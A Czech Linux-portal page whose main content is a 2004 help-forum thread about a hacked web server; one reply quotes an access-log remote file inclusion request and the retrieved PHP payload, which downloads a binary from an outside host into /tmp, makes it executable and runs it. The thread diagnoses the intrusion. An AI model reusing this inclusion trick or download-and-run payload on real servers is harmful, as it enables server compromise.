Přihlášení | Registrace

napište » Zprávičky

Závažná zranitelnost ohrožuje více než 100 modelů tiskáren Lexmark

dnes 13:11 | Bezpečnostní upozornění

Závažná zranitelnost ohrožuje více než 100 modelů tiskáren Lexmark (pdf). Společnost Lexmark vydala bezpečnostní záplatu firmwaru. Opravovaná zranitelnost může vést ke vzdálenému spuštění libovolného kódu (CVSSv3 9.0).

Ladislav Hagara | Komentářů: 5

SQLAlchemy 2.0.0

dnes 08:00 | Nová verze

Byla vydána nová major verze 2.0.0 toolkitu SQLAlchemy (Wikipedie) přinášejícího do programovacího jazyka Python podporu SQL (Structured Query Language) a ORM (Object–relational mapping). Detaily v přehledu novinek a v průvodci migrací.

Ladislav Hagara | Komentářů: 0

Rust 1.67.0

dnes 00:11 | Nová verze

Byla vydána verze 1.67.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.

Ladislav Hagara | Komentářů: 0

OPNsense 23.1 Quintessential Quail

včera 20:11 | Nová verze

Byla vydána nová verze 23.1 open source firewallové a routovací platformy OPNsense (Wikipedie). Jedná se o fork pfSense od této verze postavený na FreeBSD místo HardenedBSD. Kódový název OPNsense 23.1 je Quintessential Quail. Přehled novinek v příspěvku na blogu.

Ladislav Hagara | Komentářů: 0

Sdružení CZ.NIC zveřejnilo Domain Report 2022

včera 13:22 | IT novinky

Sdružení CZ.NIC, správce české národní domény, zveřejnilo Domain Report 2022, ve kterém upozorňuje na zajímavá data spojená s doménou .CZ. Na konci roku 2022 bylo evidováno celkem 1 463 116 domén. Průměrně bylo měsíčně zaregistrováno 17 193 domén, přičemž nejvíce registrací proběhlo v listopadu (23 581) a nejméně pak v červenci (13 199). Na rozdíl od předchozích let byl poprvé v historii zaznamenán propad v počtu domén zabezpečených

… více »

Ladislav Hagara | Komentářů: 4

Infisical, snadná správa a synchronizace proměnných prostředí

včera 09:00 | Zajímavý software

Infisical je open source nástroj s end-to-end šifrováním pro snadnou správu a synchronizaci proměnných prostředí (.env souborů) napříč vývojovým týmem, zařízeními a infrastrukturou. Zdrojové kódy jsou k dispozici na GitHubu.

Ladislav Hagara | Komentářů: 0

GNU poke 3.0

včera 08:00 | Nová verze

Interaktivní rozšiřovatelný editor pro práci se strukturovanými binárním daty GNU poke byl vydán v nové major verzi 3.0. Přehled novinek v poznámkách k vydání.

Ladislav Hagara | Komentářů: 0

FFhistory: Historie FFmpeg

25.1. 23:55 | Zajímavý článek

Kosťa Šiškov v posledních několika týdnech na svém blogu vzpomínal na různé přispěvatele do projektu FFmpeg: konec forku Libav, úvod, …, shrnutí.

Fluttershy, yay! | Komentářů: 0

Flutter 3.7 a Dart 2.19

25.1. 09:00 | Nová verze

Byla vydána nová verze 3.7 frameworku Flutter (Wikipedie) pro vývoj mobilních, webových i desktopových aplikací a nová verze 2.19 souvisejícího programovacího jazyka Dart (Wikipedie).

Ladislav Hagara | Komentářů: 0

Wine 8.0

24.1. 21:55 | Nová verze

Wine 8.0 bylo vydáno. Přehled novinek v poznámkách k vydání. Tato verze dokončuje přechod na Portable Executable moduly a WoW64 (volání 64bitových knihoven ze 32bitových aplikací).

Fluttershy, yay! | Komentářů: 5

Centrum | Napsat | Starší

navrhněte » Anketa

Výdaje na elektřinu mi meziročně

vzrostly několikanásobně (65%)

vzrostly (22%)

nezměnily se (10%)

klesly (1%)

za elektřinu neplatím (2%)

Celkem 319 hlasů

Komentářů: 5, poslední 18.1. 12:48

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / DDos utok

Štítky: Apache, Debian, distribuce, HTML, Internet, PHP, programování, TELNET, web

Dotaz: DDos utok

25.8.2004 22:46 Mexiko | skóre: 25 | Chrudim
DDos utok

Přečteno: 258×

Odpovědět | Admin

ahoj lidi, nevím jestli to souvisí se zveřejněnými zprávami o připravovaném elektronickém džihádu, ale dneska jsem na domacím kompu měl najednou obrovský příchozí traffic ( a to zrovna, když se na mne přes známého obrátil jeden človíček, že jim zahakovali server a jejich admin je na dovolené - byl tam RedHat 9 a nepatchované jádro 2.4.20-8)

Trochu jsem ten provoz analyzoval a byl především z domén telecom.cz, chello.sk, vutbr.cz a hlavne extranetplus.cz - čili skoro všechno od poskytovatelů internetu nebo z vysokoskolských koleji. Tenhle provoz sice neprocházel přes firewall, ale docela zahlcoval linku.

Máte někdo nějaký podobný poznatek, nebo to bylo něco vyjímečného. A co vám říká DSADAS ???? To byl proces, ktery se najednou objevil na tom napadenym serveru a pravidelně se pod httpd spouštělo sh -c /tmp/dsadas;rm -f /tmp/dsadas a žralo to 99% výkonu procesoru. A v TOP-u byl proces 'EXE' a kupa procesu 'supervise' - to si taky nějak nepamatuju, že bych to kdy viděl

Nástroje: Začni sledovat (0) ?

Odpovědi

13.9.2004 13:31 radim uchac
Rozbalit Rozbalit vše Re: DDos utok

spise viz. http://www.mail-archive.com/debian-security@lists.debian.org/msg13628.html

13.9.2004 14:19 radim uchac
Rozbalit Rozbalit vše Re: DDos utok

Podivejte tohle jsem nasel v logach :-)

)

access.log:142.176.141.5 - - [12/Sep/2004:09:19:28 +0200] "GET /index.php?id=http://142.176.141.5:113/ HTTP/1.1" 200 1834

a tohle jsem zkusil:
-bash-2.05b# telnet 142.176.141.5 113
Trying 142.176.141.5...
Connected to 142.176.141.5.
Escape character is '^]'.
GET /

HTTP/1.1 200 OK
Date: Tue, 22 Jun 2004 22:23:39 GMT
Server: Apache
Last-Modified: Thu, 13 May 2004 17:24:53 GMT
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: text/plain

< ? passthru("killall -9 exe dsadas /tmp/dsadas"); \
@unlink("/tmp/dsadas"); $fd = fopen("/tmp/dsadas", "w"); \
if(!$fd) exit; $xx = fopen('http://142.176.141.5/tmp', 'rb');\
 while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx);\
fclose($fd); chmod("/tmp/dsadas", 0700); \
passthru("/tmp/dsadas;rm -f /tmp/dsadas"); ? >
Connection closed by foreign host.
-bash-2.05b#

tedy jedna se o to ze uzivatele maji blbe napsane php scripty :-(